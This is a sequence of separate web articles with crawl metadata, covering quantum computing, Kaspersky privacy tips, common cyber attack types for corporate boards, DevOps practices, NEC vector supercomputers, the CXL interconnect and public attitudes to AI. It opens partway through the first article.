manager and Geek 2.0 blogger, told TechNewsWorld. “When my ‘cool’ reaction calms down, it sounds like it’s actually a very sober, interesting step to quantum computing.” That’s just one step among many, however. “Each step is in its own way significant,” said Savage. “This is a difficult area, and it’s being made reality by hundreds or thousands of tiny steps. What’s probably sad is that each step won’t be appreciated when quantum computing is a reality, because we’ll only appreciate the end result.” How soon will we see the benefits of quantum computing? So far, it’s hard to tell when practical applications might appear. “Predicting it seems almost disrespectful of the sheer effort it’ll take,” said Savage. Yet the promises of quantum computing are great. Moore’s Law, which states that the number of transistors that can be placed inexpensively on an integrated circuit doubles approximately every two years, has been strained in recent years. Quantum computing could change that. “This could give us more efficient, faster, and smaller computers,” said Savage. “It’ll ramp up everything we’re doing now even further.” Still Decades Away While the advances at Rice University may bring us closer to a day when we might use quantum computing, there is still plenty of work to do and plenty of breakthroughs to accomplish. “I think quantum computing an idea that bears looking into. It’s research that has been going on for a while,” Charles King, principal analyst at Pund-IT, told TechNewsWorld. “A number of people have taken different approaches to it. They’re working on the subatomic levels to extend Moore’s Law.” Moore’s Law may have reached its limit, which means making significantly faster computers will require new physics discoveries. “From the standpoint of silicon, we will get to the point where we can’t get any smaller,” said King. “Quantum offers a family of technologies that could be exploited to overcome that. Will it happen anytime soon? Probably not. For applications, we’re probably decades away. I wish these guys the best, and it will be interesting to see what comes down the pike over time.”
<urn:uuid:7b18f48d-e2ed-4ab9-9670-3d458e0de421>
CC-MAIN-2022-40
https://www.linuxinsider.com/story/electron-road-work-may-speed-quantum-computing-development-73441.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00252.warc.gz
en
0.938673
893
3.84375
4
Violation of our ‘personal space’ while online is a huge concern. However, the Waze exploit is only a small issue part of a much wider concern – being tracked online. According to the ‘Are you cyber savvy?’ quiz from Kaspersky Lab, 41% of consumers are uncomfortable with websites tracking their location and online activities, yet do nothing about it. Our habitual online activities like shopping, chatting, and travelling are all recorded and stored by different services. Online merchants, for example, use consumer browsing data to tailor their ads to suit user preferences. Access counters, web analytics tools and social networks also all constantly watch Internet users, track what they do online, and where they are when they do it. Kaspersky Lab has developed several tips to help users feel safe online and minimise possible risks to their privacy. Seeing is stealing - Modern mobile devices and applications can collect and transmit data about your location using geolocation services provided by mobile phone towers, nearby Wi-Fi transmitters or signals from Glonass or GPS satellites. To avoid disclosing your location, deny access to this information in the phone or browser settings when you’re not specifically using it. Foreseeing the dangers of unknown networks - When using Wi-Fi, to increase your security level, there are ways of protecting against surveillance, for example, using a VPN (Virtual Private Network). - Do not enter user names and passwords on the sites nor use instant messaging when you are connected to public Wi-Fi. It is not difficult for hackers to intercept traffic on unprotected connections or to create hotspot traps for this purpose. - If you have to use an unknown Wi-Fi connection, be sure to use a security solution that checks the security level of the wireless connection. Do not ignore its recommendations. - Do not leave the factory administrator password on your Wi-Fi router – they are published in the manuals available on manufacturers’ websites. If an attacker gains accidental access to your device settings, it will endanger the safety of your home network. Loose lips sink ships - Try to leave as little personal information as possible on sites that can be viewed by lots of visitors (e.g., social networks). Check the Privacy Settings in your social media account. Don’t post everything to everyone; organize your friends into lists/circles. Publically available information can be used to track victims more closely and to gain access to other resources. - You can also use special browser plugins such as NoScript for Firefox which block any active content unless you whitelist the pages – this is useful for Social Media, as it prevents someone tracking you down by likejacking pages. Finally, make sure your device is well protected against potential surveillance. This includes installing an updated security product and applying the latest updates for your operating system and software (e.g., Office, Flash Player, Acrobat Reader or Java). [su_box title=”About David Emm” style=”noise” box_color=”#336588″][short_info id=’60695′ desc=”true” all=”false”][/su_box]
<urn:uuid:0e5460a6-2f2c-4058-89ab-d940b49931e3>
CC-MAIN-2022-40
https://informationsecuritybuzz.com/expert-comments/67771/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00452.warc.gz
en
0.9001
665
2.640625
3
If you think “cyber attack” only means “data theft,” think again. Your company should be prepared to defend itself against many different kinds of cyber attacks—and, honestly, these things are creepy enough to keep you awake at night: - Data theft. Theft of data is, of course, a major concern. Boards should know which types of information could be valuable to an attacker—including personally identifiable information, intellectual property, customer lists, strategies, and M&A information—and how the company is protecting them. - Denial of service. Hackers may launch a “denial of service” attack that stops your company from operating its business. Not only are these attacks on the rise, but early this year, the BBC was the victim of what is now suggested as the largest denial of service attack in history. Beyond the embarrassment, a DoS attack can be costly in terms of lost business. These attacks may be sponsored by a competitor or national government, or be launched by hackers seeking glory or even ransom. - Ransoms. A new favourite attack is for hackers to infiltrate a system and install code that causes the business to grind to a halt. This can take the form of a DoS attack or the encryption of company data. The attackers then notify the victimised company that they will give back control of the business in exchange for a small fee, perhaps as little as $3,000. This isn’t very much money, but hackers can do this thousands of times a week and walk away with a big score. - Zombification. Millions of computers across the world are, right now, serving as “zombies” or “bots” that hackers are using to launch other attacks, host stolen information, and otherwise support their illegal activities. An attacker may be using your company’s systems without your even knowing it, creating reputational risks even if they don’t or can’t steal data or deny service. These four are just a handful of common attacks; new ones are being created every day. Check out this post to learn about questions you and your board should ask you CISO so they can keep vigilant on your behalf! Board Portal Buyer’s Guide With the right Board Portal software, a board can improve corporate governance and efficiency while collaborating in a secure environment. With lots of board portal vendors to choose from, the whitepaper contains the most important questions to ask during your search, divided into five essential categories. October 6, 2021 Digital Transformation Enhances How Boards & Leaders Work Together Faster, higher, stronger… those tenets so evident in the Olympic Games might equally describe the drive for digital transformation as businesses strive to adopt technologies that will unlock better commercial performance, more efficient operations and quicker time to market. However, there is an essential fourth tenet for governance, risk and compliance… July 29, 2021 What Technology Issues Are Boards and Governance Leaders Facing in 2021? Discover the biggest technology challenges faced by board governance leaders in EMEA during 2021, where progress is being made and the solutions to where it is lagging. December 28, 2020 What Role Does the Board Play in Business Continuity Planning? Continuing in the face of adversity has been the dominant theme of the past year. When the scale of disruption caused by COVID-19 became clear, businesses worldwide were forced to adapt rapidly to the restrictions that came into force overnight. While many organisations have business continuity plans designed to keep…
<urn:uuid:ae912344-5f60-4ab8-a1bf-e91ce9b54d76>
CC-MAIN-2022-40
https://www.diligent.com/en-gb/blog/four-common-hacking-attacks-need-know/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00452.warc.gz
en
0.953548
733
2.515625
3
Iterative software development is one of the most popular software engineering best practices. It is widely used for nearly twenty years as a means of alleviating the pitfalls of conventional “waterfall approaches” to software development. In recent years, iterative approaches to releasing software products and services are not confined to development cycles but rather comprise operational aspects as well. Specifically, in each cycle, software development teams are concerned not only about developing and testing working software, but also about deploying and validating the software in its operational environment. This novel paradigm is usually termed “DevOps”, as it combines both development and operations activity as part of the software development lifecycle (SDLC). The emergence of DevOps is associated with the expanded use of cloud computing infrastructures (e.g., public cloud services) for the deployment of software products and services. When deploying a software product on a cloud, development teams must account for the configuration and operation of the cloud infrastructure, as the latter can greatly impact the performance, scalability, and availability of the product, along with its overall adherence to business requirements. The DevOps paradigm enables IT-based enterprises to develop and deploy software in a way that takes into account both development and deployment aspects, while at the same time considering their combined optimization. This provides software vendors (notably high-tech startups) with exceptional agility, which sets them apart from their more bureaucratic and less flexible competitors. For these reasons, it’s important that software vendors optimize their DevOps processes, through leveraging latest trends in DevOps engineering, while using modern tools and techniques. DevOps comprises processes that reside at the intersection of development, operations and Quality Assurance (QA). In a typical DevOps environment, skilled engineers are able to perform iterative release management, through considering both development and operations at all phases of the SDLC. DevOps benefits from full-stack engineers, who carry out development end-to-end, from requirements engineering to software deployment and maintenance. During the last couple of years, DevOps has been also associated with the automation of the infrastructure and the operations of any IT-based company. In particular, DevOps engineers are nowadays using a wide array of tools that help them automate testing, deployment, and operation. Automation is very important, not only because it eliminates time-consuming and error-prone processes, but mainly because it facilitates the execution of tests and deployment processes repeatedly. Overall, modern DevOps is characterized by: DevOps automation and end-to-end management are nowadays empowered by the trends of microservices, containerization, and continuous integration. Microservices are small software components which enable companies to manage their systems as collections of vertical functionalities rather than based on the deployment of large-scale, inflexible application bundles. In this context, microservices provide flexibility and modularity, which eases the collaboration of the development team, as different members can focus on complementary vertical functionalities. This avoids conflicts and overlaps during the development of complex systems and leads to more effective management of the team. Microservices enable the structuring and organization of functionalities at both the technical and the business level. Different business functionalities (e.g., user registration, data collection, data analytics, notifications) can be developed and organized independently from each other. This provides the following advantages: Nevertheless, leveraging these advantages implies a significant operational overhead, which is required to support the operation of applications that are split into multiple, independently operating modules. Furthermore, a great degree of organizational alignment is needed, as the development and deployment team can no longer rely on traditional horizontal “siloed” roles such as software developers, QA engineers, and system administrators. In the past, these roles were in charge of developing and deploying the system as a whole, based on regular, yet minimal communications between them. In modern DevOps, older horizontal roles must co-exist and collaborate in each vertical microservice-based functionality. We are also witnessing a proliferation of DevOps engineers, who master microservices and play a cross-cutting role in DevOps projects. DevOps engineers engage in full stack development activities, as well as in configuration and validation of operational aspects such as security, operational readiness, and testing. Hence, they are in charge of infrastructure and application development at the same time. Currently, there is a proclaimed talent gap in DevOps engineers, who are expected to have multiple and multidisciplinary skills, especially when engaging in complex projects. However, in the medium term, the employment of DevOps engineers in enterprise software development teams is expected to obviate some of the traditional horizontal roles such as QA engineers. This is because DevOps engineers will be in charge of testing and deployment, with minimal or no involvement of traditional QA experts. The deployment of a new version of an application to production has been always quite challenging as a result of the heterogeneity and incompatibility of the development and production environments. In particular, different languages and their artifacts (e.g., Java archives, Node.js source code, Python or R scripts) lead to extreme heterogeneity upon the release of a new version of their runtime. In turn, this led to incompatibilities and a steep learning curve for any new member of a development team, who needs to become familiar with complex environments prior to becoming productive. Moreover, in several cases, the incompatibility of development and deployment runtimes leads to problematic deployments and system downtimes, including very complex processes to test new versions. All these big headaches are alleviated based on containerization technologies such as Docker. The latter enables bundling and deployment of software with its runtime environment, which facilitates compatibility and reliable deployments. Containerization is becoming a foundation for DevOps, as it offers a controlled environment that combines the right software with the proper operational environment. As such, “containerized” software can be directly moved from development to QA and later to production, based on a set of simple and safe configuration activities, which obviate the need for complex compatibility assurance. DevOps is greatly propelled by tools and techniques for continuous integration. Rather than pushing integration and QA at the end of a release, DevOps mandates that continuous integration takes place and that relevant feedback is provided to developers. This requires a responsive infrastructure, which makes it very easy for developers to fix problems early on, as this improves overall quality. DevOps is largely about setting up such a responsive infrastructure, which facilitates integration and testing in order to shorten release cycles and enable early reception of feedback. Therefore, continuous integration servers and tools such as Bamboo, Jenkins and recently Drone, are indispensable elements of any non-trivial DevOps infrastructure. DevOps is the certainly the present and the future of software development. Microservices, containers and continuous integration tools are certainly among its core elements. Nevertheless, DevOps is much more than a batch of modern tools such as Docker and Jenkins. It is primarily a new philosophy for organizing and managing teams, towards optimal efficiency and quality. Prior to delving into details about deploying and using tools, it’s therefore important to get acquainted with this new philosophy and how this could work for your existing projects or prospective projects. The role of CIOs in fostering an agile and innovative DevOps culture Microservices: A Powerful tool for Business Agility Secure Software Development: From DevOps to DevSecOps The DevOps Tooling Ecosystem Tools and Techniques DevOps Continuous Integration and Testing Significance of Customer Involvement in Agile Methodology Quantum Computing for Business – Hype or Opportunity? The emerging role of Autonomic Systems for Advanced IT Service Management Why is Data Fabric gaining traction in Enterprise Data Management? How Metaverse could change the business landscape We're here to help! No obligation quotes in 48 hours. Teams setup within 2 weeks. If you are a Service Provider looking to register, please fill out this Information Request and someone will get in touch. Outsource with Confidence to high quality Service Providers. If you are a Service Provider looking to register, please fill out this Information Request and someone will get in Enter your email id and we'll send a link to reset your password to the address we have for your account. The IT Exchange service provider network is exclusive and by-invite. There is no cost to get on-board; if you are competent in your areas of focus, then you are welcome. As a part of this exclusive
<urn:uuid:bc4daa46-d013-4fea-a213-7cfeeca08a84>
CC-MAIN-2022-40
https://www.itexchangeweb.com/blog/modern-devops-for-software-quality-and-automation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00452.warc.gz
en
0.950464
1,746
2.6875
3
There are two different Auroras right now in supercomputing. There is the shape-shifting, legendary, and maybe even mythical “Aurora” and now “Aurora A21” exascale supercomputer that was being built by Intel with “Knights” many core processors and now, if Intel can get them out the door, with a combination of “Sapphire Rapids” Xeon SP processors and “Ponte Vecchio” Xe GPU accelerators, for Argonne National Laboratory. And then there is the real Aurora vector-engine based systems from supercomputer maker NEC that you have been able to buy for the past four years. The Czech Hydrometeorological Institute (CHMI), which is the models and forecasts weather, climate, air quality, and hydrology for the Czech Republic, has just bought a liquid cooled hybrid supercomputer based on X86 processors and Aurora vector engines to radically improve its simulation capabilities. Headquartered in the capital city of Prague, notably with offices in the beer haven of Plzeň in western Bohemia. (Doesn’t that sound idyllic?) Like many smaller meteorological institutions in Europe and some of the bigger ones in Japan and Asia throughout the decades, CHMI has been a longtime user of NEC parallel vector processors, which are akin to the original Cray vector machines from days gone by. And, interestingly, NEC is the last of the vector supercomputer makers that is still in the game, but just the same, it has had to go with a parallel processor-accelerator approach with the Tsubasa SX parallel vector architecture, based on the Aurora accelerators, to being down costs and boost scalability. CHMI, whose lovely headquarters is shown in the feature image above, has been on the NEC vector computing ride for a long time. So it is not at all surprising that the meteorological agency would stick with this architecture, however modified it has become. And while many customers have moved away from the SX architecture (and those in the United States, like the National Center for Atmospheric Research in 1996, were prevented from buying NEC and Fujitsu supercomputer gear after dumping charges and import tariffs were placed on these two vendors after complaints by Cray.) The vector machines, like those of Cray and Fujitsu and even IBM with the vector-assisted 3090-VF mainframes from years gone by, were all good machines and elegantly designed. Through 2006, the last year we have any data, NEC had sold north of 1,000 SX vector supercomputers worldwide. It is probably close to double that now. As we reminded everyone when the Aurora vector engines surfaced in the fall of 2016 ahead of the SC16 supercomputing conference, the most famous NEC vector supercomputer was the Earth Simulator system, which was the most powerful machine in the world from 2001 through 2004, which had 5,120 vector engines, based on its SX-6 design, delivering a then-stunning 35.9 teraflops at a cost of $350 million. This machine was upgraded to the ES2 system in 2009, using the SX-9 architecture and the $1.2 billion Project K supercomputer was supposed to have vector partitions made by NEC, but the Great Recession compelled NEC to pull out and leave the whole deal to Fujitsu for the engine and Hitachi for the interconnect. (Fujitsu eventually took over the whole project.) The feeds and speeds of the initial Aurora Vector Engine 10A, 10B, and 10C devices were detailed here, and, and we did a follow-up deep dive into the architecture a few weeks later there. At the time, the Aurora vector engines could absolutely beat Intel “Skylake” and “Knights Landing” and Nvidia “Volta” V100 GPUs on price and could beat Intel CPUs on double precision flops performance; the initial Aurora chips had 48 GB of HBM2 memory, and could beat the tar out of any of these other devices on memory bandwidth. With the kicker Vector Engine 20A/20B devices, NEC has boosted performance to 3 teraflops, up 22.5 percent compared to the prior Vector Engine A series at 2.45 teraflops and memory bandwidth to 1.5 TB/sec, up 25 percent from the 1.2 TB/sec with the HBM2 stack in the first Aurora chips. CHMI ordered a new Tsubasa supercomputer from NEC’s German subsidiary last September and it was installed and operational in December, although the meteorological agency is just talking about it now. The cluster that CHMI has bought has 48 two-socket AMD Epyc 7002 series CPUs and eight of the latest Vector Engine 20B vector engines in the system’s PCI-Express 4.0 slots, for a total of 385 vector engines. Those 48 nodes have a combined 18 TB of HBM2 memory plus 24 TB of memory on the X86 hosts, plus a 2 PB parallel file system based on NEC’s LxFS-z storage, which is the Japanese company’s implementation of the Lustre open source parallel file system atop of Sun Microsystems’ (now Oracle’s) ZFS file system. The compute and storage nodes are interlinked using an Nvidia 200 Gb/sec HDR InfiniBand network, and they are also kept from overheating by direct liquid cooling. The Czechoslovak Republic was established at the end of World War I in 1919, and shortly thereafter the National Meteorological Institute, the predecessor to the CHMI, was formed. The organization is an expert at air pollution dispersion models, and is also a big contributor, along with France, to the ALADIN numerical weather prediction system, which was in used by 26 countries when CHMI bought a 320-node Xeon E5 cluster from NEC with 7,680 cores and using 100 Gb/sec EDR InfiniBand interconnect to do its weather modeling; this system had 1 PB of LxFS-z storage. Over the years, CHMI had had a fair amount of NEC systems, but because they do not often break into the Top500 rankings of systems that run High Performance Linpack and then brag about it (that is not the same thing as saying the top 500 supercomputers in the world for true HPC applications). We can’t find all of them, but we found a few. In 2008, CHMI had a single NEC SX-6/8A-32, which is a 32 vector engine system that is based roughly on the same technology as Earth Simulator, plus a bunch of Sun Microsystems Sun Fire Opteron servers for Oracle databases and other workloads. And in 2016, CHMI had two NEC SX-9 nodes, with 16 vector processors and 1 TB of main memory each, running its simulations, plus some Oracle T5-8 servers running databases. These, of course, are the engines used in the ES2 kicker to Earth Simulator. What NEC really needs now is to get an ES3 deal with the Japanese government – but given the success and cost of the “Fugaku” system at RIKEN, with its Arm processors and fat integrated vector engines, this seems unlikely. But stranger things have happened. NEC certainly has a roadmap going out a few years: The question is how hard will NEC push performance alongside that bandwidth push shown above. Moving to 7 nanometer technologies could allow at least a doubling of performance. We shall see what NEC does next year.
<urn:uuid:e4b5e14e-7479-4f08-a798-759d93e2a43a>
CC-MAIN-2022-40
https://www.nextplatform.com/2021/02/12/czech-republic-sticks-with-nec-vector-engines-for-weather-modeling/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00452.warc.gz
en
0.96142
1,567
2.78125
3
The system world would have been a simpler place if InfiniBand had fulfilled its original promise as a universal fabric interconnect for linking all manner of devices together within a system and across systems. But that didn’t happen, and we have been left with a bifurcated set of interconnects ever since. Let’s rattle them off for fun. There are the memory buses that link DDR4 and HBM2 memory to processors. There is some agreement on how to etch controllers for these memories, since they all have to speak the same physical memory, but there are still many different memory controller designs. There are NUMA interconnects between sockets in a single physical machine as well as NUMA interconnects that span multiple server nodes to create shared memory systems that span two, four, eight, or sixteen sockets. These are all largely proprietary, and have been for as long as there has been NUMA iron. (Nearly three decades.) Then there is the PCI-Express bus and its accelerated forms. This includes NVM-Express acceleration for flash, which gets the CPU hosts out of the loop when the network wants to access data on flash as well as GPUDirect over PCI-Express, which link GPU memories to each other without host involvement in a similar fashion. AMD’s Infinity Fabric is a kind of superset of PCI-Express, borrowing techniques from its HyperTransport NUMA interconnect, to create a universal fabric for linking CPUs to each other, GPUs to each other, and CPUs to GPUs. Nvidia’s NVSwitch is a fabric that speaks load/store memory semantics that links GPU memories to each other in something akin to a NUMA setup, but just for the GPUs. (NVSwitch could, in theory, be used to create a switched fabric that links CPU memories to GPU memories provided that a CPU had NVLink ports on it, but thus far only IBM’s Power9 chips had such ports and NVSwitch was not used in this fashion.) The CCIX accelerator interconnect uses the PCI-Express transport and protocol as its foundation, was created initially by Xilinx and then endorsed by AMD and actually adopted by Arm Holdings as an accelerator interconnect as well as a NUMA interconnect between Arm CPUs. It has been shown off in various Neoverse CPU designs, but has yet to be implemented in an actual volume Arm server chip. IBM’s CAPI interconnect ran atop PCI-Express 3.0 or PCI-Express 4.0 transports, but the OpenCAPI interface runs on specialized high speed SerDes on Power9 and Power10 chips, circuits that are being used not only to link accelerators in a coherent fashion to Power CPUs, but also to link the DDR5 main memory in the impending Power10 chip to the processor. The Gen-Z protocol out of Hewlett Packard Enterprise had its own way of linking a fabric of server nodes to a giant shared memory that we still think is interesting. And finally, InfiniBand and Ethernet keep getting higher and higher bandwidth and have sufficient latency to do interesting things. But their latencies are still too large for creating coherent memory spaces for diverse compute engines to play in together. Still, like time, bandwidth increases, latency drops, and the plethora of new protocols heal all wounds. And now, that diversity of interconnects is opening up the options for system architecture. The resulting architectures might be more complex, but they are also potentially richer and also could result in the ability to not only co-design hardware and software more tightly in future hybrid systems and distributed computing clusters built from them, but to dial up the right combination of price and performance to meet particular budget requirements. That is the impression we took away from a keynote address that Debendra Das Sharma, Intel Fellow and director of I/O technology and standards at Intel, gave at the recent Hot Interconnects 28 conference. Das Sharma gave an overview of the Compute Express Link, or CXL, interconnect that Intel has developed in response to the myriad accelerator and memory interconnects that have been put out there in the past decade. CXL came last, resembles many of the protocols mentioned above, and may not be perfect in all use cases. But it is the one interconnect that seems destined to be widely adopted, and that means we have to pay attention to how it is evolving. Das Sharma gave us an interesting glimpse of this future, which helps fulfill some of the ideas driving disaggregated and composable architectures — which we are a big fan of here at The Next Platform because it allows for the sharing of compute and memory resources and a precise (yet flexible) fitting of hardware to the application software. It All Starts With The PCI-Express Bus Although sufficient for its intended design as a peripheral interconnect for servers, the PCI-Express bus did not offer very high bandwidth for many years — certainly not high enough to link memories together — and importantly was stuck in the mud at the PCI-Express 3.0 speed for four or five years longer than the market could tolerate. Ethernet and InfiniBand were essentially stuck in the same mud at 40Gb/sec speeds at the same time until signaling technologies to push up bandwidth were painstakingly developed. This is a great chart that gives you the transfer rates and latencies for the two broad types of interconnects, which you need to keep in mind as you think about any of these interconnects: If you wanted to add another important dimension here, it would be the length of the possible connections between devices. But suffice it to say, low latency always implies short distance because of the limit of the speed of electrons in copper and photons in glass, and latency always increases with greater distance because of retimers, switch hops, and such. The good news is that the next several generations at least between PCI-Express 4.0 and 7.0, it looks like we will see a two-year cadence of bandwidth increases with the PCI-Express interconnect, and PCI-Express switch fabrics that will have lots of bandwidth, reasonable radix, and with only a few tiers of switching will be able to span racks of gear pretty easily and, if bandwidth is held constant to drive up latency, could even span more than a few racks. This is all important in the context of the CXL coherent overlay for PCI-Express. The PCI-Express 6.0 protocol, which we talked about in detail a year ago with Das Sharma, the bandwidth is going up through the addition of PAM-4 signaling, which has been implemented on several generations of datacenter switch ASICs already, and which encodes two bits in each signal coming out of the chip, thus doubling the effective bandwidth at a given clock speed. And the real clever thing is FLIT encoding and error correction, which is new and which has a lot less overhead than forward error correction does, and so the latency on PCI-Express 6.0 is going down, not up. And going down by half, which is just huge. And by shifting to a denser pulse amplitude modulation encoding — perhaps PAM-16 — the effective bandwidth can be doubled up again and latency dropped a bit with the PCI-Express 7.0 spec due around the end of 2023 and implemented probably two years later if history is any guide. We did a deep dive into the CXL protocol two years ago, and we are not going to go through all of that again from the beginning. But this chart sums up the three elements of the protocol rather nicely for a quick review: Here are the important things to consider. The CXL.io layer is essentially the same as the PCI-Express protocol, and the CXL.cache and CXL.memory layers are new and provide similar latency to that of SMP and NUMA interconnects used to glue the caches and main memories of multisocket servers together — “significantly under 200 nanoseconds” as Das Sharma put it — and about half the latency of the raw PCI-Express protocol itself. It is that latency drop — and further ones that we are expecting in the future — combined with the drumbeat cadence of bandwidth increases that makes CXL an interesting tool in the system architect’s toolbox. The CXL protocol specification, in fact, says that a snoop response on a snoop command when a cache line is missed has to be under 50 nanoseconds pin to pin, and for memory reads, pin to pin as well, has to be under 80 nanoseconds. By contrast, a DDR4 memory access is around 80 nanoseconds, and a NUMA access to far memory in an adjacent socket is around 135 nanoseconds, according to system designers at Microsoft. And as a further refresher, here are the three different usage models of CXL and the parts of the protocol they will use: While the CXL 1.0 and 1.1 specs were about point-to-point links between CPUs and accelerator memory or between CPUs and memory extenders, as you can see from the use cases above, the forthcoming CXL 2.0 spec will allow a switched fabric that allows multiple Type 1 and Type 2 devices as shown above to be configured to a single host and have their caches be coherent, as well as allowing for memory pooling across multiple hosts using Type 3 memory buffer devices. This is what expands CXL from a protocol that links elements within a server chassis to one that links disaggregated compute and memory across a rack or possibly several racks — and frankly, puts CXL in some kind of contention with the Gen-Z protocol, despite all of the hatchet-burying that we have discussed in the past. Economics will drive the pooling of main memory, and whether or not customers choose the CXL way or the Gen-Z way. Considering that memory can account for half of the cost of a server at a hyperscaler, anything that allows a machine to have a minimal amount of capacity on the node and then share the rest in the rack — with all of it being transparent to the operating system and all of it looking local — will be adopted. There is just no question about that. Memory area networks, in one fashion or another, are going to be common in datacenters before too long, and this will be driven by economics. Das Sharma had some other possible future directions for the use of CXL in systems. Let’s go through them. The first scenario is for both memory capacity and memory bandwidth to be expanded through the use of CXL: In this first scenario, chunks of DRAM are attached to the system over CXL and augment the bandwidth and capacity of DDR DRAM that hang off the traditional memory controllers. But over time, Das Sharma says that chunks of main memory could be put on the compute package itself — Foveros chip stacking is how Intel will do it — and eventually the on-chip DDR memory controllers could be dropped and just PCI-Express controllers running CXL could connect to external DRAM. (This is, in effect, what IBM is doing with its OpenCAPI Memory Interface, although it is using a proprietary 32Gb/sec SerDes to do it instead of a PCI-Express controller.) It is very likely that the on-package memory referenced in the chart above would be HBM, and probably not very much of it to reduce package costs. The idea of memory that plugs in like a disk or flash drive is a long time coming. In scenario two, CXL is used to create non-volatile DIMM memory for backing up all of main memory on in the system: This NVDIMM memory is based on a mix of persistent memory (Optane 3D XPoint memory in Intel’s world) and DDR DRAM and, in some cases, this is converted to computational storage with the addition of local compute inside of the NVDIMM. In scenario three that Das Sharma posited, the system will use a mix of CXL computational storage, CXL memory, and CXL NVDIMM memory, all sharing asymmetrically with the host processor’s DDR4 main memory using the CXL protocol. Like this: And in scenario four, CXL disaggregation and composability is taken out to the rack level: In essence, the rack becomes the server. There are some challenges that have to be dealt with, of course. But having a whole rack that is load/store addressable is very interesting indeed. It remains to be seen where the system software to control this will reside, but it looks like we need a memory hypervisor. Maybe Intel will snap up MemVerge and control this key piece of software as it develops.
<urn:uuid:8b84384d-b0c8-4585-8168-66e1aa39be47>
CC-MAIN-2022-40
https://www.nextplatform.com/2021/09/07/the-cxl-roadmap-opens-up-the-memory-hierarchy/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00452.warc.gz
en
0.951237
2,645
2.5625
3
Public opinion towards technology varies significantly across the globe – a recent study by the Pew Research Center revealed people in Asia are substantially more positive about AI and automation than their peers in the West. These attitudes shape how technology is perceived and adopted, and leaders must engage with them in good faith when implementing technologies that impact people’s lives. Public opinion on AI and automation The Pew Research Center study shows stark global differences in public attitudes towards robotics and AI. When asked their opinion on the technologies, more than 60% of respondents in Singapore, South Korea, Taiwan and Japan said they were good for society. By comparison, fewer than half of respondents in the US, Canada, and much of Western Europe shared this positive view. France has the most negative opinion of AI and robotics overall, with less than 40% thinking the technologies have been good for society. These attitudes affect the extent to which given technologies will be accepted within a society, and many have failed after clashing with public opinion. Low adoption of Covid-19 tracing apps in the UK and US, for example, can be attributed in part to distrust of the location-tracking technology they rely on. Vargha Moayed, chief strategy officer of robotic process automation (RPA) software vendor UiPath, says national attitudes shape the reception of its technology by clients and their employees. “Japan is the most forthcoming and there is no fear of robots per se,” he explains. “Japanese companies have always been very good at reskilling their people, so they just accept it and even embrace AI and technology.” By contrast, many European countries tend to be more concerned with the way AI and automation will affect citizen well-being and the ethical questions raised by technology, Moayed explains. As a result, UiPath pays careful attention to the views of its clients’ employees – which have “strong correlation” with public opinion, Moayed says – when implementing its systems, as they have a significant impact on a successful transition to automation. The roots of technology mistrust Sometimes, public mistrust of a given technology reflects deep-seated cultural values. Baobao Zhang, who researches AI governance and public opinion on AI at Cornell University, has found people often misunderstand what AI and machine learning are, and instead base opinions on cultural or community attitudes and “gut instinct”. Patrick Sturgis, a professor of quantitative social science at the London School of Economics, says this can be seen in public opinion research. People often support science and technology in the abstract, but their feelings about specific advancements will vary according to media portrayals as well as their previously held beliefs. “These are areas where… science and technology tend to come into conflict with people’s core values,” says Sturgis. “Obviously religion is one important marker, but they can be kind of humanist values as well.” The Pew Research study found that, in every country except India and Russia, those with a higher education level are more likely to support AI and robotics. Sturgis says there is evidence that a higher education level makes people more trustworthy of science in general, too. “As a university graduate, you are more likely to understand the process of science, to reject conspiracy theories about science,” he says. But technology leaders must not dismiss public mistrust of tech as irrational or uneducated. “There are things that people should be wary of, and rightfully so,” says Zhang, such as racial bias in AI systems used by law enforcement. Sturgis adds that people with a lower socio-economic status might rightly question whether they will benefit from technological advancements. “There’s a justified suspicion that ‘we’re not going to gain from this, someone’s going to gain but it’s not going to be us’,” he says. “If there’s going to be oil taken out of the ground near here, am I going to have cheaper energy bills? Probably not, but I might have a smoke-filled environment and trucks going by.” Building trust in innovation Perhaps recognising that people’s concerns about innovations are often well founded, many scientific organisations are changing how they engage with the public, away from ‘educating’ towards a conversational approach, says Sturgis. “I think over the past few decades that’s changed to a more kind of… dialogic approach where the idea is to engage and involve and have a two-way conversation so that people are not being spoken at, but are part of the whole process,” he says. But there is a difference between good-faith engagement and a public-relations exercise designed to curtail a possible backlash. “Trust in science really should be based on trustworthiness of the scientific actors rather than just promoting trust,” he says. Zhang says that she is seeing an increasing movement from tech companies to be more transparent, allowing experts from outside the company to test out new developments and find flaws. However, some have questioned the extent to which voluntary commitments to transparency will prevent organisations from using AI harmfully. UiPath advises its clients to pursue “bottom-up” change management programmes when introducing automation. This means involving employees from the beginning of a transition and allowing them to try out the software themselves. But he also says clients need to acknowledge the “legitimate apprehension” of employees who will have seen huge technological change within their lifetimes. “It’s hypocritical to say that technology does not destroy some categories of jobs,” Moayed says. “You need to manage that transition, in terms of being able to provide opportunities for people that are going to be displaced to acquire new skills.” “Trying to slow down innovation is silly,” he adds. “On the other hand, being naive about it and believing that everything will just take care of itself is also, in the 21st century, unacceptable.”
<urn:uuid:700f66cd-aca9-4df2-8ba5-3051ab6c750d>
CC-MAIN-2022-40
https://techmonitor.ai/technology/ai-and-automation/public-opinion-ai
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00452.warc.gz
en
0.962972
1,260
2.71875
3
